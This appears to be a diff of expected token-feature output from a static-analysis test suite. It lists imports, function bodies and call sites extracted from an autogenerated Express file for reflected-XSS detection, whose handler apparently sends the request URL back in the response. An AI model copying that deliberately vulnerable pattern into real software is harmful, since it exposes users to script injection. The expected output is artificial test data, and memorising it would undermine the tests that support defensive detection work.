autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:18:2:20 | url | fileImports | | +| autogenerated/Xss/ReflectedXss/partial.js:1:1:1:0 | this | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:1:1:1:0 | this | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:1:1:1:1 | R | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:1:1:1:1 | R | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:1:1:1:1 | R | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:1:1:1:1 | lodash | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:1:1:1:1 | lodash | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:1:1:1:1 | lodash | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:1:1:1:1 | require | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:1:1:1:1 | require | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:1:1:1:1 | underscore | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:1:1:1:1 | underscore | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:1:1:1:1 | underscore | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:1:5:1:11 | express | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:1:5:1:11 | express | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:1:5:1:32 | express | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:1:5:1:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:1:5:1:32 | express | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:1:5:1:32 | express ... press') | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:1:15:1:21 | require | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:1:15:1:21 | require | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:1:15:1:32 | exceptional return of require('express') | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:1:15:1:32 | require('express') | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:1:15:1:32 | require('express') | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/partial.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:1:23:1:31 | 'express' | calleeImports | | | autogenerated/Xss/ReflectedXss/partial.js:1:23:1:31 | 'express' | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | | autogenerated/Xss/ReflectedXss/partial.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/partial.js:1:23:1:31 | 'express' | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:2:5:2:14 | underscore | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:2:5:2:14 | underscore | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:2:5:2:14 | underscore | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:2:5:2:14 | underscore | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:2:5:2:38 | undersc ... score') | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:2:5:2:38 | undersc ... score') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:2:5:2:38 | undersc ... score') | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:2:5:2:38 | underscore | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:2:5:2:38 | underscore | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:2:5:2:38 | underscore | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:2:18:2:24 | require | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:2:18:2:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:2:18:2:24 | require | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:2:18:2:38 | exceptional return of require ... score') | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:2:18:2:38 | exceptional return of require ... score') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:2:18:2:38 | exceptional return of require ... score') | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:2:18:2:38 | require ... score') | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:2:18:2:38 | require ... score') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:2:18:2:38 | require ... score') | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:2:26:2:37 | 'underscore' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/partial.js:2:26:2:37 | 'underscore' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:2:26:2:37 | 'underscore' | calleeImports | | | autogenerated/Xss/ReflectedXss/partial.js:2:26:2:37 | 'underscore' | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | | autogenerated/Xss/ReflectedXss/partial.js:2:26:2:37 | 'underscore' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/partial.js:2:26:2:37 | 'underscore' | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:3:5:3:10 | lodash | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:3:5:3:10 | lodash | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:3:5:3:10 | lodash | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:3:5:3:10 | lodash | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:3:5:3:30 | lodash | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:3:5:3:30 | lodash | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:3:5:3:30 | lodash | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:3:5:3:30 | lodash ... odash') | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:3:5:3:30 | lodash ... odash') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:3:5:3:30 | lodash ... odash') | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:3:14:3:20 | require | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:3:14:3:20 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:3:14:3:20 | require | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:3:14:3:30 | exceptional return of require('lodash') | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:3:14:3:30 | exceptional return of require('lodash') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:3:14:3:30 | exceptional return of require('lodash') | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:3:14:3:30 | require('lodash') | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:3:14:3:30 | require('lodash') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:3:14:3:30 | require('lodash') | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:3:22:3:29 | 'lodash' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/partial.js:3:22:3:29 | 'lodash' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:3:22:3:29 | 'lodash' | calleeImports | | | autogenerated/Xss/ReflectedXss/partial.js:3:22:3:29 | 'lodash' | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | | autogenerated/Xss/ReflectedXss/partial.js:3:22:3:29 | 'lodash' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/partial.js:3:22:3:29 | 'lodash' | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:4:5:4:5 | R | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:4:5:4:5 | R | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:4:5:4:5 | R | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:4:5:4:5 | R | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:4:5:4:24 | R | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:4:5:4:24 | R | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:4:5:4:24 | R | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:4:5:4:24 | R = require('ramda') | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:4:5:4:24 | R = require('ramda') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:4:5:4:24 | R = require('ramda') | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:4:9:4:15 | require | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:4:9:4:15 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:4:9:4:15 | require | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:4:9:4:24 | exceptional return of require('ramda') | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:4:9:4:24 | exceptional return of require('ramda') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:4:9:4:24 | exceptional return of require('ramda') | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:4:9:4:24 | require('ramda') | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:4:9:4:24 | require('ramda') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:4:9:4:24 | require('ramda') | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:4:17:4:23 | 'ramda' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/partial.js:4:17:4:23 | 'ramda' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:4:17:4:23 | 'ramda' | calleeImports | | | autogenerated/Xss/ReflectedXss/partial.js:4:17:4:23 | 'ramda' | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | | autogenerated/Xss/ReflectedXss/partial.js:4:17:4:23 | 'ramda' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/partial.js:4:17:4:23 | 'ramda' | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:6:5:6:7 | app | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:6:5:6:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:6:5:6:7 | app | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:6:5:6:19 | app | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:6:5:6:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:6:5:6:19 | app | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:6:5:6:19 | app = express() | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:6:5:6:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:6:5:6:19 | app = express() | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:6:11:6:17 | express | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:6:11:6:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:6:11:6:17 | express | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:6:11:6:19 | exceptional return of express() | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:6:11:6:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:6:11:6:19 | exceptional return of express() | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:6:11:6:19 | express() | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:6:11:6:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:6:11:6:19 | express() | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:8:1:8:3 | app | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:8:1:8:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:8:1:8:3 | app | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:8:1:8:7 | app.get | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:8:1:8:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:8:1:8:7 | app.get | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:8:1:15:2 | app.get ... ck);\\n}) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:8:1:15:2 | app.get ... ck);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:8:1:15:2 | app.get ... ck);\\n}) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:8:1:15:2 | exceptional return of app.get ... ck);\\n}) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:8:1:15:2 | exceptional return of app.get ... ck);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:8:1:15:2 | exceptional return of app.get ... ck);\\n}) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:8:5:8:7 | get | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:8:5:8:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:8:5:8:7 | get | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:8:9:8:20 | "/some/path" | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/partial.js:8:9:8:20 | "/some/path" | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:8:9:8:20 | "/some/path" | calleeImports | express | @@ -21573,6 +143637,16 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:8:9:8:20 | "/some/path" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/partial.js:8:9:8:20 | "/some/path" | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:8:9:8:20 | "/some/path" | receiverName | app | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:8:23 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:8:23 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:8:23 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:8:23 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:8:23 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | 'arguments' object of anonymous function | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | (req, r ... ack);\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | (req, r ... ack);\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | (req, r ... ack);\\n} | calleeImports | express | @@ -21580,6 +143654,130 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | (req, r ... ack);\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | (req, r ... ack);\\n} | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | (req, r ... ack);\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | exceptional return of anonymous function | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | exceptional return of anonymous function | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | exceptional return of anonymous function | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | return of anonymous function | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | return of anonymous function | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:8:23:15:1 | return of anonymous function | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:8:24:8:26 | req | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:8:24:8:26 | req | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:8:24:8:26 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:8:24:8:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:8:24:8:26 | req | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:8:24:8:26 | req | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:8:24:8:26 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:8:24:8:26 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:8:24:8:26 | req | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:8:24:8:26 | req | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:8:29:8:31 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:8:29:8:31 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:8:29:8:31 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:8:29:8:31 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:8:29:8:31 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:8:29:8:31 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:8:29:8:31 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:8:29:8:31 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:8:29:8:31 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:8:29:8:31 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:8:29:8:31 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:8:29:8:31 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:8:29:8:31 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:9:2 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:9:2 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:9:2 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:9:2 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:9:2 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:9:2 | this | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:9:2 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:9:3:9:2 | this | enclosingFunctionBody | req res sendResponse x y res send x y callback sendResponse bind null req url 1 2 